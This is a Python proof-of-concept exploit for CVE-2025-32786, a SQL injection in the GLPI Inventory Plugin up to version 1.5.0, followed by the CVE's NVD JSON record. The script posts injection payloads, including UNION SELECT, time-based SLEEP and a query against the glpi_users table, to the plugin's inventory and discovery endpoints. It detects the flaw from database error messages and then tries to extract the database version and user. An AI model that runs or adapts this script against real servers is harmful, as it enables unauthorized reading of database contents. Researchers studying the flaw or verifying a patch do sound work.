CVE-2025-32786

# CVE-2025-32786 SQL Injection PoC # Target: GLPI Inventory Plugin <= 1.5.0 # Author: Security Researcher # Note: This is a proof-of-concept for authorized security testing only import requests import sys def test_sql_injection(url, target_param): """ Test for SQL injection vulnerability in GLPI Inventory Plugin """ # Basic injection test payload payloads = [ "' OR '1'='1", "' UNION SELECT NULL--", "' AND SLEEP(5)--", "'; SELECT * FROM glpi_users--" ] headers = { 'User-Agent': 'GLPI-Inventory-Agent/1.0', 'Content-Type': 'application/x-www-form-urlencoded' } for payload in payloads: try: data = { target_param: payload, 'action': 'inventory' } response = requests.post( f"{url}/plugins/glpiinventory/front/inventory.php", data=data, headers=headers, timeout=10 ) # Check for SQL error indicators sql_errors = [ 'SQL syntax', 'MySQL server version', 'Warning: mysql', 'PDOException', 'SQLSTATE' ] for error in sql_errors: if error in response.text: print(f"[+] SQL Injection detected with payload: {payload}") print(f"[+] Error found: {error}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def extract_data(url): """ Extract data using UNION-based injection (if vulnerable) """ # Example: Extract database version and current user union_payload = "' UNION SELECT @@version,user(),3,4,5--" headers = { 'User-Agent': 'GLPI-Inventory-Agent/1.0' } data = { 'ip': union_payload, 'action': 'discover' } try: response = requests.post( f"{url}/plugins/glpiinventory/front/discovery.php", data=data, headers=headers, timeout=30 ) print(f"[+] Response status: {response.status_code}") print(f"[+] Response length: {len(response.text)}") return response.text except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-32786.py <target_url>") print("Example: python cve-2025-32786.py http://vulnerable-glpi.local") sys.exit(1) target_url = sys.argv[1] print(f"[*] Testing CVE-2025-32786 on {target_url}") if test_sql_injection(target_url, 'ip'): print("[!] Target is likely vulnerable!") print("[*] Attempting data extraction...") extract_data(target_url) else: print("[-] No obvious SQL injection detected")

{"cve": {"id": "CVE-2025-32786", "sourceIdentifier": "[email protected]", "published": "2025-11-04T21:15:36.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The GLPI Inventory Plugin handles network discovery, inventory, software deployment, and data collection for GLPI agents. Versions 1.5.0 and below are vulnerable to SQL Injection. This issue is fixed in version 1.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/glpi-project/glpi-inventory-plugin/blob/1.5.1/CHANGELOG.md", "source": "[email protected]"}, {"url": "https://github.com/glpi-project/glpi-inventory-plugin/releases/tag/1.5.1", "source": "[email protected]"}, {"url": "https://github.com/glpi-project/glpi-inventory-plugin/security/advisories/GHSA-w2cp-r675-6xpq", "source": "[email protected]"}]}}